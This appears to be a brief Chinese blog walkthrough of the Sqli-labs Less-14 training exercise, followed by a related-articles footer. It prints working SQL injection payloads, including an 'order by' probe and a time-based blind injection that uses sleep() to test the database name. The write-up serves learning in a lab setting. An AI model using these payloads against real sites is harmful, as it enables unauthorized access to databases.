利用双引号测试报错成功,查看报错信息
Less-14【报错注入】
在利用双引号进一步测试
123" order by 3 #
Less-14【报错注入】
查看具体列内容时,发现网页未回显,所以需要配合时间注入进行测试
Less-14【报错注入】
123" union select if((database()='security'),sleep(10),sleep(2)),null #
Less-14【报错注入】
 

相关文章:

  • 2021-09-07
  • 2021-06-05
  • 2022-12-23
  • 2021-11-10
  • 2022-02-26
  • 2021-11-24
  • 2022-01-24
  • 2022-02-25
猜你喜欢
  • 2021-10-22
  • 2022-01-14
  • 2022-02-10
  • 2021-12-05
  • 2021-05-19
  • 2021-07-05
  • 2021-10-01
相关资源
相似解决方案